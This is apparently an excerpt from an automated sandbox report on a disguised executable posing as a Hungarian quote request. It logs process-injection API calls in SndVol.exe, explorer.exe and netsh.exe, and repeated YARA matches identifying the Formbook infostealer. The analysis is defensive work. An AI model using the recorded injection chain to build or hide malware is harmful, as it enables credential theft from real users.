          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2D30 NtUnmapViewOfSection,LdrInitializeThunk | 5_2_365D2D30
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2DD0 NtDelayExecution,LdrInitializeThunk | 5_2_365D2DD0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2DF0 NtQuerySystemInformation,LdrInitializeThunk | 5_2_365D2DF0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2AD0 NtReadFile,LdrInitializeThunk | 5_2_365D2AD0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2B60 NtClose,LdrInitializeThunk | 5_2_365D2B60
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 5_2_365D2BF0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D35C0 NtCreateMutant | 5_2_365D35C0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D3010 NtOpenDirectoryObject | 5_2_365D3010
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D3090 NtSetValueKey | 5_2_365D3090
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D3D70 NtOpenThread | 5_2_365D3D70
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D3D10 NtOpenProcessToken | 5_2_365D3D10
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D39B0 NtGetContextThread | 5_2_365D39B0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D4650 NtSuspendThread | 5_2_365D4650
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D4340 NtSetContextThread | 5_2_365D4340
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2E30 NtWriteVirtualMemory | 5_2_365D2E30
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2EE0 NtQueueApcThread | 5_2_365D2EE0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2F60 NtCreateProcessEx | 5_2_365D2F60
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2FA0 NtQuerySection | 5_2_365D2FA0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2C60 NtCreateKey | 5_2_365D2C60
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2C00 NtQueryInformationProcess | 5_2_365D2C00
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2CC0 NtQueryVirtualMemory | 5_2_365D2CC0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2CF0 NtOpenProcess | 5_2_365D2CF0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2D00 NtSetInformationFile | 5_2_365D2D00
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2DB0 NtEnumerateKey | 5_2_365D2DB0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2AF0 NtWriteFile | 5_2_365D2AF0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2AB0 NtWaitForSingleObject | 5_2_365D2AB0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2BE0 NtQueryValueKey | 5_2_365D2BE0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2B80 NtQueryInformationFile | 5_2_365D2B80
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2BA0 NtEnumerateValueKey | 5_2_365D2BA0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3651A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose | 5_2_3651A036
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_3651A042 NtQueryInformationProcess | 5_2_3651A042
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E577E12 NtProtectVirtualMemory | 6_2_0E577E12
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E576232 NtCreateFile | 6_2_0E576232
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E577E0A NtProtectVirtualMemory | 6_2_0E577E0A
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2B60 NtClose,LdrInitializeThunk | 7_2_038B2B60
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2AD0 NtReadFile,LdrInitializeThunk | 7_2_038B2AD0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2FE0 NtCreateFile,LdrInitializeThunk | 7_2_038B2FE0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2F30 NtCreateSection,LdrInitializeThunk | 7_2_038B2F30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk | 7_2_038B2EA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2DD0 NtDelayExecution,LdrInitializeThunk | 7_2_038B2DD0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2DF0 NtQuerySystemInformation,LdrInitializeThunk | 7_2_038B2DF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2D10 NtMapViewOfSection,LdrInitializeThunk | 7_2_038B2D10
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2CA0 NtQueryInformationToken,LdrInitializeThunk | 7_2_038B2CA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2C60 NtCreateKey,LdrInitializeThunk | 7_2_038B2C60
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2C70 NtFreeVirtualMemory,LdrInitializeThunk | 7_2_038B2C70
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B35C0 NtCreateMutant,LdrInitializeThunk | 7_2_038B35C0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B4340 NtSetContextThread | 7_2_038B4340
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B4650 NtSuspendThread | 7_2_038B4650
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2B80 NtQueryInformationFile | 7_2_038B2B80
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2BA0 NtEnumerateValueKey | 7_2_038B2BA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2BE0 NtQueryValueKey | 7_2_038B2BE0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2BF0 NtAllocateVirtualMemory | 7_2_038B2BF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2AB0 NtWaitForSingleObject | 7_2_038B2AB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2AF0 NtWriteFile | 7_2_038B2AF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2F90 NtProtectVirtualMemory | 7_2_038B2F90
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2FA0 NtQuerySection | 7_2_038B2FA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2FB0 NtResumeThread | 7_2_038B2FB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2F60 NtCreateProcessEx | 7_2_038B2F60
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2E80 NtReadVirtualMemory | 7_2_038B2E80
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2EE0 NtQueueApcThread | 7_2_038B2EE0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2E30 NtWriteVirtualMemory | 7_2_038B2E30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2DB0 NtEnumerateKey | 7_2_038B2DB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2D00 NtSetInformationFile | 7_2_038B2D00
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2D30 NtUnmapViewOfSection | 7_2_038B2D30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2CC0 NtQueryVirtualMemory | 7_2_038B2CC0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2CF0 NtOpenProcess | 7_2_038B2CF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B2C00 NtQueryInformationProcess | 7_2_038B2C00
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B3090 NtSetValueKey | 7_2_038B3090
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B3010 NtOpenDirectoryObject | 7_2_038B3010
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B39B0 NtGetContextThread | 7_2_038B39B0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B3D10 NtOpenProcessToken | 7_2_038B3D10
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_038B3D70 NtOpenThread | 7_2_038B3D70
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_00B9A3E0 NtReadFile | 7_2_00B9A3E0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_00B9A330 NtCreateFile | 7_2_00B9A330
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_00B9A460 NtClose | 7_2_00B9A460
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_00B9A48A NtReadFile | 7_2_00B9A48A
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_00B9A45B NtClose | 7_2_00B9A45B
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_03689BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose | 7_2_03689BAF
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_0368A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread | 7_2_0368A036
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_03689BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection | 7_2_03689BB2
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 7_2_0368A042 NtQueryInformationProcess | 7_2_0368A042
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B8788 CreateProcessAsUserW,0_2_029B8788
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: String function: 029A46D4 appears 244 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: String function: 029B894C appears 56 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: String function: 029B89D0 appears 45 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: String function: 029A44DC appears 74 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: String function: 029A4860 appears 949 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: String function: 029A4500 appears 33 times
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 365E7E54 appears 107 times
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 3661F290 appears 101 times
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 3658B970 appears 262 times
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 3660EA12 appears 82 times
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 365D5130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 038C7E54 appears 107 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 038FF290 appears 103 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 038EEA12 appears 86 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 038B5130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 0386B970 appears 262 times
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Binary or memory string: OriginalFilename vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002805000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021635000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002802000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002801000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1831855062.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002806000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021606000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
